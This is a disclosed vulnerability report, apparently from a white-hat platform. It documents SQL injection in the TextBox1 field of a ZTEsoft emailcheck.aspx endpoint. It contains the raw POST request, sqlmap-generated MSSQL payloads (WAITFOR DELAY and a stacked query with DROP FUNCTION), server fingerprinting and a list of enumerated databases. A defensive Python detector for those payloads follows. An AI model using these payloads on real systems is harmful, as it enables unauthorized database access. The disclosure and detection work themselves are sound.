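2015-03-23: Details reported to the vendor; awaiting vendor response
2015-03-23: Vendor confirmed; details disclosed to the vendor only
2015-04-02: Details disclosed to core white hats and relevant domain experts
2015-04-12: Details disclosed to regular white hats
2015-04-22: Details disclosed to intern white hats
2015-05-07: Details disclosed to the public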
http://www.ztesoft.com:18085/sq/emailcheck.aspx
SQL injection in a ZTEsoft interface:
POST /sq/emailcheck.aspx HTTP/1.1
Content-Length: 369
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.ztesoft.com:18085/
Cookie: ASP.NET_SessionId=sjtfsve1a3lq5a555vnfok45
Host: www.ztesoft.com:18085
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Button1=Submit&TextBox1=1&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs%2bO2w8dDw7bDxpPDE3Pjs%2bO2w8dDxwPHA8bDxOYXZpZ2F0ZVVybDs%2bO2w8bWFpbHRvOnh1LmR1b0B6dGUuY29tLmNuP3N1YmplY3Q9SSB3YW50IHRvIGpvaW4gdGhlIHNhdGlzZmFjdGlvbiBxdWVzdGlvbm5haXJlOz4%2bOz47Oz47Pj47Pj47Pndu%2bHogmyqqjAlTGkBPicUQLlMs&__VIEWSTATEGENERATOR=4607DA12
The TextBox1 parameter
14 databases:
sqlmap identified the following injection points with a total of 728 HTTP(s) requests:
---
Place: POST
Parameter: TextBox1
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: Button1=Submit&TextBox1=1'; IF(9302=9302) SELECT 9302 ELSE DROP FUNCTION aNqw--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Button1=Submit&TextBox1=1'; WAITFOR DELAY '0:0:5'--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Button1=Submit&TextBox1=1' WAITFOR DELAY '0:0:5'--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
available databases [14]:
[*] cot_bsn
[*] FAQDB
[*] lumigent
[*] LumigentDemoDB
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] TekRADIUS
[*] tempdb
[*] urtracker
[*] urtracker_bsn
[*] urtracker_ccb
Database: cot_bsn
[101 tables]
Not digging any deeper~
Severity: High
Vulnerability Rank: 13
Confirmed at: 2015-03-23 13:56
Thanks~
None yet
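A defender-side check for the three TextBox1 payload shapes in the sqlmap output above, as an added example that is not part of the original report or the vendor's code. The function names, the marker set and the assumption that TextBox1 is meant to hold an e-mail address are illustrative; the sample bodies are constructed from the values shown on the page, with __VIEWSTATE omitted.

```python
import re
from urllib.parse import parse_qs, urlencode

# Markers taken from the three payload shapes in the sqlmap output above.
TSQL_MARKERS = {
    "stacked_statement": re.compile(r"'\s*;"),
    "time_delay": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "conditional_branch": re.compile(r"\bIF\s*\(\s*\d+\s*=\s*\d+\s*\)", re.I),
    "trailing_comment": re.compile(r"--\s*$"),
}
# Assumption: the field is meant to hold an e-mail address (allow-list check).
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,253}\.[A-Za-z]{2,24}")


def inspect_body(body, field="TextBox1"):
    """Return (is_valid_email, matched marker names) for one urlencoded POST body."""
    value = parse_qs(body, keep_blank_values=True).get(field, [""])[0]
    hits = sorted(name for name, rx in TSQL_MARKERS.items() if rx.search(value))
    return bool(EMAIL_RE.fullmatch(value)), hits


def classify(body):
    """'allow' for a well-formed address, 'alert' on T-SQL markers, else 'reject'."""
    valid, hits = inspect_body(body)
    if hits:
        return "alert"
    return "allow" if valid else "reject"


def sample_bodies():
    """Constructed request bodies: the page's TextBox1 values, re-encoded for the wire."""
    values = [
        "user@example.com",  # constructed benign input
        "1",                 # value sent in the original request
        "1'; IF(9302=9302) SELECT 9302 ELSE DROP FUNCTION aNqw--",
        "1'; WAITFOR DELAY '0:0:5'--",
        "1' WAITFOR DELAY '0:0:5'--",
    ]
    return [urlencode({"Button1": "Submit", "TextBox1": v}) for v in values]


if __name__ == "__main__":
    for body in sample_bodies():
        print(classify(body), inspect_body(body)[1])
```

Validation and alerting of this kind complement a parameterized query in the handler; they do not replace it.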